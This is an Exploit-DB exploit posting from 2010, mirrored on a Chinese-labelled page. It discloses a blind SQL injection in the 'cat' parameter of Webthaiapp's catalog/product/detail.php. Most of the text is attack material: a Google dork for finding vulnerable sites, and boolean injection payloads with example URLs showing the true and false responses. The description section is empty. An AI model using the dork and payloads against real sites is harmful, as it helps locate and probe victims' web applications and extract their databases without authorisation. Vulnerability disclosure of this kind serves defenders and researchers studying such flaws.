Webthaiapp – ‘detail.php?cat’ Blind SQL Injection

  • 作者: Xelenonz
    日期: 2010-04-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12467/
  • --==+==================================================+==--
    
    --==+ Webthaiapp detail.php(cat) Blind Sql injection Vulnerability+==--
    
    --==+==================================================+==--
    
    Date : 30-04-2010
    
    -=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    AUTHOR: Xelenonz
    
    Homepage : www.thaishadow.com
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
    
    Application : Webthaiapp
    
    Vendor: http://www.Webthaiapp.com/
    
    -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    DORK (google): "inurl:catalog/product/detail.php?cat="
    
    -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    DESCRIPTION:
    
    EXPLOITS:
    
    detail.php?cat=[valid catid]+and+1=1 << TRUE
    
    detail.php?cat=[valid catid]+and+1=2<< False
    
    -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    Example
    
    http://server/catalog/product/detail.php?cat=44+and+1=1
    << True
    
    http://server/catalog/product/detail.php?cat=44+and+1=2 
    << False
    
    -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    Special Thx : Krit admin@thaishadow,Thaishadow.com
    
    -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=